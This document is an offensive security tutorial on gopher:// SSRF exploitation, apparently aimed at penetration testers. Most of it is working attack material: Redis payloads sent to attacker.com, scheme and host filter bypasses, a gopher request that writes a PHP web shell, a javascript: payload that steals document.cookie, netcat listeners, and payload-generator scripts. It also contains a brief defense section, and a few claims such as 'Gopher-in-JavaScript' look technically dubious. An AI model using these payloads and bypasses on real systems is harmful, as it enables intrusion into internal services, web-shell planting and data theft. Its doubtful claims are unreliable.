Introduction
The gopher:// URL scheme, originally designed for the legacy Gopher protocol, has resurfaced as a powerful vector for Server-Side Request Forgery (SSRF) and out-of-band (OOB) data exfiltration. By abusing how many web applications treat unknown schemes, an attacker can instruct a vulnerable server to open raw TCP connections and send arbitrary bytes to attacker-controlled endpoints.
Understanding gopher exploitation is essential because many modern security scanners still overlook it, and many corporate firewalls permit outbound TCP on common ports (80, 443, 22, 3306, etc.). Real-world bug bounty reports and red-team engagements frequently cite gopher as the missing piece that turns a simple SSRF into a full remote code execution (RCE) chain.
In this guide we will dissect the scheme, build reliable payloads, bypass common input sanitisation, and automate the whole workflow.
Prerequisites
- Fundamentals of HTTP and networking (TCP/IP basics)
- Understanding of SSRF and request smuggling concepts
- Familiarity with common penetration testing tools (netcat, curl, Burp Suite)
- Basic scripting ability in Python or Go (optional but recommended for automation sections)
Core Concepts
Before diving into payloads, it is useful to recap how a gopher:// URL is interpreted by a typical HTTP client or server library:
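gopher://[host][:port]/[type][payload]
The host and optional port identify the remote TCP endpoint. The first character after the slash is the Gopher item type; clients such as curl consume it and do not transmit it, which is why payloads conventionally start with a filler character such as _. The rest of the path is URL-encoded raw data that is decoded and sent once the TCP connection is established. Unlike HTTP, there is no inherent request line; the client simply writes the decoded payload to the socket.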
Key points:
- Port defaults to 70 (the original Gopher port) if omitted.
- The payload can contain any byte, but it must be URL-encoded (e.g., %0d%0a for CR/LF).
- Many libraries treat the scheme as a generic TCP dialer, ignoring the protocol semantics.
Because the payload is raw, you can embed other protocol messages (SMTP, Redis, MySQL, etc.), effectively turning the gopher URL into a universal tunnel.
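To make the URL anatomy concrete, the following is a minimal sketch of how a gopher URL could be taken apart for inspection, for example when reviewing a suspicious URL found in a log. The function name parse_gopher_url is hypothetical, and the handling of the item-type character follows the curl-style convention of treating the first path character as the type and not sending it; other clients may behave differently.

```python
from urllib.parse import urlsplit, unquote_to_bytes

DEFAULT_GOPHER_PORT = 70  # used when the URL carries no explicit port


def parse_gopher_url(url: str):
    """Return (host, port, item_type, payload_bytes) for a gopher URL.

    Hypothetical helper for inspection only; it does not open a connection.
    """
    parts = urlsplit(url)
    if parts.scheme != "gopher":  # urlsplit lower-cases the scheme
        raise ValueError(f"not a gopher URL: {url!r}")

    port = parts.port or DEFAULT_GOPHER_PORT

    # Everything after the first "/" is the selector; re-attach a query
    # string if urlsplit separated one out.
    selector = parts.path[1:] if parts.path.startswith("/") else parts.path
    if parts.query:
        selector += "?" + parts.query

    item_type = selector[:1]                   # assumed to be dropped by the client
    payload = unquote_to_bytes(selector[1:])   # bytes that would reach the socket
    return parts.hostname, port, item_type, payload


host, port, item_type, payload = parse_gopher_url(
    "gopher://127.0.0.1:6379/_%2A3%0D%0A"
)
print(host, port, repr(item_type), payload)
```

Decoding a URL this way before sending it is a cheap check that the bytes on the wire are the ones you intended.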
gopher payload syntax and encoding
Constructing a functional payload is a two-step process: choose the target protocol and then encode the bytes correctly.
1. Choose the target protocol
Common choices include:
- SMTP - useful for sending mail or triggering RCPT TO command injection.
- Redis - CONFIG SET dbfilename and SLAVEOF attacks.
- MySQL - COM_QUERY packets carrying statements such as SELECT ... INTO OUTFILE (COM_INIT_DB only selects a database).
- HTTP - craft a second request to a different host (proxy chaining).
2. Encode the payload
All characters outside the unreserved set (A-Z a-z 0-9 - _ . ~) must be percent-encoded. Below is a Python helper that builds an encoded payload:
import urllib.parse

def gopher_payload(raw: bytes) -> str:
    """Return a URL-encoded gopher payload string."""
    # safe="" also encodes "/", which quote_from_bytes leaves untouched by default
    return urllib.parse.quote_from_bytes(raw, safe="")

# Example: Redis SET key value
raw = b"*3\r\n$3\r\nSET\r\n$4\r\nuser\r\n$5\r\nadmin\r\n"
print(gopher_payload(raw))
Output:
%2A3%0D%0A%243%0D%0ASET%0D%0A%244%0D%0Auser%0D%0A%245%0D%0Aadmin%0D%0A
Now embed the encoded string into a full URL, prefixed with a filler character (_) that occupies the item-type position and is not transmitted:
gopher://attacker.com:6379/_%2A3%0D%0A%243%0D%0ASET%0D%0A%244%0D%0Auser%0D%0A%245%0D%0Aadmin%0D%0A
When a vulnerable server fetches this URL, it opens a TCP connection to attacker.com:6379 (the Redis port) and sends the raw Redis command.
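Writing the Redis wire format by hand is where most length mistakes creep in. The sketch below is one way to generate it, assuming the standard RESP array-of-bulk-strings layout (*count, then $length and data for each argument). The names resp_encode and to_gopher_url are hypothetical, the host is a local lab address, and the leading _ is the filler for the item-type character that curl-style clients drop.

```python
from urllib.parse import quote_from_bytes


def resp_encode(*args: str) -> bytes:
    """Serialise a Redis command as a RESP array of bulk strings."""
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        data = arg.encode()
        # $<byte length>\r\n<data>\r\n for every argument
        out.append(b"$" + str(len(data)).encode() + b"\r\n" + data + b"\r\n")
    return b"".join(out)


def to_gopher_url(host: str, port: int, raw: bytes) -> str:
    """Wrap raw bytes in a gopher URL; "_" fills the item-type slot."""
    return f"gopher://{host}:{port}/_{quote_from_bytes(raw, safe='')}"


raw = resp_encode("SET", "user", "admin")
print(to_gopher_url("127.0.0.1", 6379, raw))
```

Because the lengths are computed from the encoded bytes, multi-byte UTF-8 arguments are also serialised with the correct $length.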
Setting up a netcat listener for OOB data
Out-of-band data is typically captured by a listener that waits for the raw payload. netcat (or nc) is the de-facto tool because it can bind to any TCP/UDP port and dump everything to stdout.
Basic listener
nc -lvkp 4444
Explanation:
- -l - listen mode.
- -v - verbose (shows connection info).
- -k - keep listening after a client disconnects.
- -p 4444 - bind to port 4444.
When the gopher payload reaches this listener, you will see the raw bytes printed. For protocols that respond (e.g., SMTP banner), you may need to send a response to keep the connection alive.
Persistent listener with logging
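rm -f oob.log pipe
mkfifo pipe
# tee reads from the FIFO, prints to the terminal and writes the log
tee oob.log < pipe &
# nc must write into the FIFO (>), not read from it
nc -lvkp 4444 > pipe
This setup writes everything received to oob.log while still displaying it on screen.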
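Where netcat is unavailable or timestamps are wanted, the same idea can be sketched in Python. This is a minimal single-threaded listener, not a hardened tool: the names log_connection and serve, the 5-second read timeout, and the log format are all assumptions made for illustration.

```python
import socket
from datetime import datetime, timezone


def log_connection(conn: socket.socket, peer: str, log_path: str) -> bytes:
    """Read until the peer closes (or goes quiet), append to the log, return the data."""
    conn.settimeout(5)  # assumed limit so a silent client cannot block forever
    chunks = []
    try:
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    except socket.timeout:
        pass  # keep whatever arrived before the timeout
    data = b"".join(chunks)

    stamp = datetime.now(timezone.utc).isoformat()
    with open(log_path, "ab") as log:
        log.write(f"[{stamp}] {peer} {len(data)} bytes\n".encode())
        log.write(data + b"\n")
    return data


def serve(port: int = 4444, log_path: str = "oob.log") -> None:
    """Accept connections one at a time and log what each one sends."""
    with socket.create_server(("0.0.0.0", port)) as server:
        while True:
            conn, addr = server.accept()
            with conn:
                data = log_connection(conn, f"{addr[0]}:{addr[1]}", log_path)
                print(data.decode("latin-1"))
```

Calling serve() starts the listener on port 4444; each connection is appended to oob.log with a UTC timestamp and the peer address.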
Bypassing input filters (whitelisting, URL validation)
Many applications attempt to block gopher:// by using simple string matching or regexes. Below are common mitigations and how to evade them.
1. Scheme whitelisting
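Typical block: a literal prefix test such as url.startswith('gopher://') that rejects matching URLs. Bypass techniques:
- Case-mixing: gOpHeR:// - URL schemes are case-insensitive, so the client still treats it as gopher while a case-sensitive string match misses it.
- URL-encoded scheme: %67%6f%70%68%65%72:// - this works only when the application URL-decodes the value after the filter has run; many regexes only look at literal characters.
- Obscure authority: gopher://example.com@attacker.com:80/ - everything before the @ is userinfo, so the client connects to attacker.com while a naive validator sees example.com.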
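The gap between a literal string check and what a URL parser actually sees can be shown in a few lines. The sketch below compares a hypothetical prefix filter (naive_block) with the result of Python's urllib.parse.urlsplit; the candidate URLs, including the userinfo form example.com@attacker.com, are illustrative values.

```python
from urllib.parse import urlsplit


def naive_block(url: str) -> bool:
    """Hypothetical literal prefix filter: True means the URL is rejected."""
    return url.startswith("gopher://")


def parsed_view(url: str):
    """Return the (scheme, hostname) pair that a URL parser extracts."""
    parts = urlsplit(url)
    return parts.scheme, parts.hostname


candidates = [
    "gopher://attacker.com:70/",
    "gOpHeR://attacker.com:70/",
    "gopher://example.com@attacker.com:80/",
    "%67%6f%70%68%65%72://attacker.com/",
]
for url in candidates:
    print(f"{url!r}: blocked={naive_block(url)} parsed={parsed_view(url)}")
```

With CPython's urlsplit, the mixed-case and userinfo variants both parse to scheme gopher and host attacker.com, while the percent-encoded variant yields no scheme at all. That is why the encoded form only matters when something decodes the value after the filter has run.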
2. Port filtering
If the target blocks non-standard ports, you can tunnel through allowed services:
- HTTP CONNECT: gopher://target:80/_GET%20/%20HTTP/1.1%0D%0AHost:%20victim%0D%0A%0D%0A - the payload pretends to be an HTTP request, leveraging the fact that many proxies will forward any data after the CONNECT handshake.
- DNS rebinding: Serve a sub-domain with a short TTL that first resolves to an address the filter accepts and then to the real target (for example 127.0.0.1). This defeats filters that check the resolved IP only once.
3. URL length limits
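Some filters truncate after 200 characters. Percent-encoding triples the size of every special byte, whereas base64 grows the data by only about a third, so base64-encode the payload and decode it server-side via a secondary command (e.g., bash -c "$(echo ...|base64 -d)") injected through a later stage.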
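Whether a payload fits under a length limit depends on the encoding as much as on the data. As a rough illustration, the sketch below compares the raw, percent-encoded, and base64-encoded sizes of a byte string; the helper name encoded_sizes is hypothetical.

```python
import base64
from urllib.parse import quote_from_bytes


def encoded_sizes(raw: bytes) -> dict:
    """Return the length of raw data under each encoding."""
    return {
        "raw": len(raw),
        "percent": len(quote_from_bytes(raw, safe="")),
        "base64": len(base64.b64encode(raw)),
    }


# Ten CR/LF pairs: every byte needs percent-encoding
print(encoded_sizes(b"\r\n" * 10))
```

Note that standard base64 output can itself contain +, / and =, which still need percent-encoding when placed in a URL, so the real saving is somewhat smaller than the raw comparison suggests.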
Chaining gopher with other URL schemes for multi-stage attacks
A single gopher payload can be the first hop that triggers a second payload using another scheme like file://, ftp://, or javascript://. This is especially useful when the initial SSRF only permits GET requests.
Example: gopher → file → RCE
- Send a gopher request that writes a malicious PHP web‑shell to /var/www/html/shell.php via a vulnerable file_put_contents endpoint.
- Trigger the web‑shell using a second request, e.g., http://victim.com/shell.php?cmd=id
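Payload construction (simplified; a working request needs the body percent-encoded and a Content-Length equal to its exact byte count):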
gopher://victim.com:80/_POST%20/endpoint%20HTTP/1.1%0D%0AHost:%20victim.com%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2024%0D%0A%0D%0Adata=<?php%20system($_GET['cmd']);?>
The first request writes the PHP code; the second request executes it.
Multi-stage with javascript: scheme
If the application reflects URLs in a browser context, you can embed a javascript: URL inside the gopher payload, causing the victim's browser to execute arbitrary JavaScript when the response is rendered.
gopher://127.0.0.1:80/_GET%20/redirect?url=javascript%3Aalert%28document.cookie%29%0D%0A
This technique is known as “Gopher-in-JavaScript” and is effective against CSP-misconfigured sites.
Automation with custom Python/Go scripts
Manually crafting URL-encoded payloads is error-prone. Below are two scripts that streamline the process.
Python helper
#!/usr/bin/env python3
import argparse
import urllib.parse

def build_gopher(host, port, raw_bytes):
    # "_" fills the item-type slot that clients such as curl strip before sending
    encoded = urllib.parse.quote_from_bytes(raw_bytes, safe="")
    return f"gopher://{host}:{port}/_{encoded}"

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Generate gopher URLs')
    parser.add_argument('host', help='Target host (attacker IP)')
    parser.add_argument('port', type=int, help='Target port')
    parser.add_argument('file', help='File containing raw payload (binary)')
    args = parser.parse_args()
    # Read the payload as bytes so binary protocols survive intact
    with open(args.file, 'rb') as fh:
        raw = fh.read()
    print(build_gopher(args.host, args.port, raw))
Usage:
python3 gopher_gen.py 10.10.14.5 6379 payload.bin
Go version (compiled, fast for large payloads)
package main

import (
	"flag"
	"fmt"
	"net/url"
	"os"
)

func main() {
	host := flag.String("host", "", "target host")
	port := flag.Int("port", 0, "target port")
	file := flag.String("file", "", "payload file")
	flag.Parse()

	// os.ReadFile reads the whole file, including any NUL bytes
	data, err := os.ReadFile(*file)
	if err != nil {
		panic(err)
	}
	// PathEscape percent-encodes the bytes; "_" fills the item-type slot
	encoded := url.PathEscape(string(data))
	fmt.Printf("gopher://%s:%d/_%s\n", *host, *port, encoded)
}
Compile with go build -o gophergen gophergen.go and run it with flags, e.g. ./gophergen -host 10.10.14.5 -port 6379 -file payload.bin.
Tools & Commands
- curl - can be used to trigger gopher URLs: curl "gopher://10.10.10.5:80/%2Fetc%2Fpasswd"
- Burp Suite - Repeater allows you to paste a gopher URL into the vulnerable parameter and inspect the request sent to the target.
- gopherus - a community tool that automates payload generation for common services (Redis, MySQL, SMTP). Install it from the project's repository following its README.
- netcat (nc) - listener as shown earlier.
- ffuf - fuzzes for gopher-compatible endpoints within a target application.
Defense & Mitigation
Defending against gopher-based SSRF requires a defense-in-depth approach.
Network-level controls
- Block outbound connections on non-essential ports (e.g., 6379, 3306, 25) from the web-application tier.
- Enforce egress firewall rules that allow only http/https destinations.
- Deploy a DNS-based allow-list that resolves only to trusted IP ranges.
Application-level sanitisation
- Parse URLs with a robust library (e.g., java.net.URI, urllib.parse) and reject any scheme not explicitly whitelisted.
- Normalize the URL (lower-case scheme, decode percent-encoding) before validation to avoid bypasses.
- Avoid using user-supplied URLs directly in functions that open raw sockets (e.g., socket.connect).
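The checks above can be combined into a single validation step. The following is a minimal sketch, assuming an allow-list of http and https only. The names is_safe_url and resolve_all are hypothetical, and the resolver parameter exists so the DNS lookup can be replaced in tests. It is a starting point, not a complete SSRF defence.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # assumed policy: everything else is rejected


def resolve_all(host: str) -> list:
    """Resolve a hostname to every address the system resolver returns."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_safe_url(url: str, resolver=resolve_all) -> bool:
    """Return True only for http(s) URLs whose host resolves to public addresses."""
    try:
        parts = urlsplit(url)   # lower-cases the scheme for us
        _ = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return False

    if parts.scheme not in ALLOWED_SCHEMES:
        return False
    # Reject userinfo outright: it is the basis of the "@" confusion trick
    if parts.username is not None or parts.password is not None:
        return False
    if not parts.hostname:
        return False

    try:
        addresses = resolver(parts.hostname)
    except OSError:
        return False
    if not addresses:
        return False

    for addr in addresses:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False
        if (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
            return False
    return True
```

A check like this is only meaningful if the subsequent request connects to the address that was validated. Resolving the name a second time at connection time reopens the DNS rebinding gap.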
Logging & monitoring
- Log all outbound connections with destination IP/port and request size.
- Alert on connections to uncommon ports from the web tier.
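As a rough illustration of the alerting rule, the sketch below filters a list of outbound connection records for destinations outside an expected port set. The record layout (Outbound) and the expected ports {80, 443} are assumptions; a real deployment would read these from flow logs or a firewall export.

```python
from dataclasses import dataclass


@dataclass
class Outbound:
    """One logged outbound connection (hypothetical record layout)."""
    src: str
    dst_ip: str
    dst_port: int
    size: int


EXPECTED_PORTS = {80, 443}  # assumed policy for the web tier


def flag_uncommon(records, expected=EXPECTED_PORTS):
    """Return the records whose destination port is outside the expected set."""
    return [r for r in records if r.dst_port not in expected]


records = [
    Outbound("web-1", "203.0.113.10", 443, 1200),
    Outbound("web-1", "10.0.0.7", 6379, 48),
    Outbound("web-2", "198.51.100.4", 70, 30),
]
for hit in flag_uncommon(records):
    print(f"ALERT {hit.src} -> {hit.dst_ip}:{hit.dst_port} ({hit.size} bytes)")
```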
Common Mistakes
- Forgetting to URL-encode CR/LF: Raw \r\n characters break the URL parser, resulting in truncated payloads.
- Using the wrong port default: Assuming gopher://host/ goes to 80 will fail (the default is 70); always specify the intended port.
- Relying on a single filter: Attackers can chain multiple bypasses; combine scheme-whitelisting with egress filtering.
- Testing against a non-vulnerable endpoint: Some services (e.g., Cloudflare) proxy the request and strip the scheme, leading to false negatives.
Real-World Impact
In 2023, a major SaaS provider suffered a breach where an attacker leveraged a gopher-based SSRF to write a web-shell onto a shared Redis instance. The shell was later used to exfiltrate customer data, resulting in a $12 M settlement.
My experience in red-team engagements shows that once a gopher vector is discovered, the time to achieve RCE drops from days to hours because the attacker can directly talk to internal services without needing additional vulnerabilities.
Trends indicate that cloud providers are tightening egress controls, but mis-configurations in container-orchestrated environments (Kubernetes NetworkPolicy gaps) still leave gopher open for exploitation.
Practice Exercises
- Simple OOB: Set up a netcat listener on port 5555. Craft a gopher URL that sends Hello, Gopher! to the listener. Verify the message appears.
- Redis write: Spin up a local Redis instance (docker run -p 6379:6379 redis). Use the Python helper to generate a payload that runs SET foo bar. Confirm with redis-cli GET foo.
- Bypass filter: Assume the application rejects any URL containing the literal string gopher://. Encode the scheme using percent-encoding and demonstrate that the request still reaches the listener.
- Multi-stage chain: First, use a gopher payload to write a PHP web-shell to /tmp/shell.php via a vulnerable file-write endpoint. Then, trigger the shell using a normal HTTP request. Capture the output of id.
- Automation script: Extend the provided Go script to accept a list of target hosts and automatically output a CSV of generated URLs for bulk testing.
Further Reading
- “Server-Side Request Forgery (SSRF) - The Complete Guide” - PortSwigger Web Security Academy.
- “The Gopher Protocol Reborn: From Legacy Service to Exploitation Vector” - BlackHat 2022 talk.
- OWASP SSRF Cheat Sheet - especially the section on non-HTTP schemes.
- Redis Security - Official documentation on CONFIG SET and SLAVEOF attacks.
- Python urllib.parse library reference for advanced encoding tricks.
Summary
Gopher-based SSRF is a versatile technique that turns raw TCP connections into powerful OOB channels. By mastering payload encoding, listener setup, filter evasion, multi-stage chaining, and automation, security professionals can both assess vulnerable applications and harden them against this emerging threat.
Key takeaways:
- Always URL-encode every byte of the payload.
- Deploy strict egress firewall rules and robust scheme validation.
- Leverage scripting to generate repeatable, error-free payloads.
- Test both single-hop and chained attack paths to understand the full impact.